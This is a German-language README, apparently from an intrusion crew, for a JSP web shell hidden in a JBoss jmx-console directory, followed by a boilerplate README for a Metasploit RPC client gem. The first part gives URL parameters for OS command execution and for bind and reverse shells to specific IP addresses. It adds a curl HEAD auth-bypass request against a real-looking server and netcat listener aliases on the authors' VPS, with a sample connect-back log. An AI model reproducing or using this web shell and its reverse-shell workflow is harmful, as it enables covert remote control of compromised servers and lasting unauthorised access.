Javashell & Metasploit Addons ... 
   ---------------------
Simple,small,efektiv & without HTML ;)

.. ich hab ne spezielle kleine javashell geschrieben, die im (passwortgeschützen)
jmx-console dir platziert werden kann ( sonst wo passt ebendso ).
Auf die PW geschütze datei würden wir dann mit dem gleichen trick zugreifen.
Wird dafür sorgen das rehacker erstmla unsere methode kenne müssen ;)



Folgenden neue funktionen:

- AUTO OS detection! - kein cmd/bash shell mehr ändern
  -(file?exec=<command>) - auto select OS
  -(file?cmd=<command>)  - force set shell to cmd.exe
  -(file?bash=<command>)  - force set shell to linux bash

- Bindshell 
  - ( file?bind=<TCP-PORT> ) - dann einfach connecten per netcat: shell>nc <host> <tcp-port>

- Reverse Shell ( file?revhost=86.56.11.99&revport=9999)
  - Connect Back shell, start vorher Netcat! Portfreigabe nicht vergessen,
    bzw tunnel auf meinem VPS einrichten! Die rechte habt ihr.
  - linux> nc -l 9999
  - win32> nc -L -p 9999 

zugriff per auth. bypass ( win32/linux ):
 - ihr benötigt curl, dies ist eigentlich auf jedem OS verfügbar

- dann einfach wie folgt ausführen:

  shell> curl -X HEAD -I -s "http://46.4.62.145:8080/jmx-console/display.jsp?bind=9944"

-X steht für die sende methode ( anstatt GET/POST, HEAD,etc)
-I gibt uns die header infos aus & mehr nicht 
 --> bind: wenn curl beim bind "hängen" bleibt ist des ein success, timeout bei curl is default glaub bei 30 sekunden
 

Note: Legt euch aliases an!
 --> start nc aufm vps wir incoming reverse shells:
 linux: shell> alias start-back='ssh $USER@94.126.19.130 nc -v -lk -p 9944' 

	  shell># alias start-back='ssh $USER@94.126.19.130 nc -v -lk -p 9944' 
	  shell># start-back
	  listening on [any] 9944 ...
	  connect to [94.126.19.130] from static.145.62.4.46.clients.your-server.de [46.4.62.145] 55027

  --> revshell on host
   ..... folgt



Gather  - MSFRPC Client Libary
========================================
Simple private libary um den umgang mit dem RPC sich zu vereinfachen 

... dont expect to much! 

```ruby
gem 'Gather'
```

And then execute:

    $ bundle

Or install it yourself as:

    $ gem install Gather

## Usage

TODO: Write usage instructions here

## Contributing

1. Fork it ( https://github.com/[my-github-username]/Gather/fork )
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create a new Pull Request
